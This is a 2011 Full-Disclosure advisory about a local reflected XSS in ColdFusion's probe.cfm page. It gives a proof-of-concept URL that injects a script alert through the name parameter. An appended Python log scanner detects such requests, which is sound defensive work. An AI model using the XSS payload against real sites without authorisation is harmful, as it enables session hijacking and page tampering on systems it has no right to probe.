[Full-disclosure] ColdFusion Local Parameter Xss Exploit
Rem7ter
rem7ter at gmail.com
Thu Aug 18 10:28:00 BST 2011
*Description:* ColdFusion probe.cfm page local parameter is vulnerable to XSS
*CVE:* Unknown
*PoC:*
http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
The URL.Name parameter is vulnerable to XSS only locally.
Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html
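
For defenders, one way to look for this pattern in web server access logs. This is an added example, not part of the original post: it flags requests to /CFIDE/probe.cfm whose name parameter carries markup after percent-decoding. The log format (Common/Combined), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client address and request target of a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out into HTML or script context.
MARKUP_RE = re.compile(r'[<>"\']|javascript:', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253Cscript is seen as <script."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_probe_requests(log_lines):
    """Return (client_ip, decoded_name) for probe.cfm hits with markup in 'name'."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        url = urlsplit(m.group("target"))
        # Compare case-insensitively so /cfide/Probe.cfm and ?NAME= are not missed.
        if url.path.lower() != "/cfide/probe.cfm":
            continue
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() != "name":
                continue
            for raw in values:
                name = fully_decode(raw)  # parse_qs has already decoded once
                if MARKUP_RE.search(name):
                    hits.append((m.group("ip"), name))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [18/Aug/2011:10:28:00 +0100] "GET /CFIDE/probe.cfm?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '127.0.0.1 - - [18/Aug/2011:10:28:05 +0100] "GET /CFIDE/probe.cfm?name=healthcheck HTTP/1.1" 200 498',
    '127.0.0.1 - - [18/Aug/2011:10:28:09 +0100] "GET /cfide/probe.cfm?NAME=%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 505',
    '127.0.0.1 - - [18/Aug/2011:10:28:12 +0100] "GET /index.cfm?name=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, name in suspicious_probe_requests(SAMPLE_LOG):
        print(ip, repr(name))
```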
Full-Disclosure is hosted and sponsored by Secunia.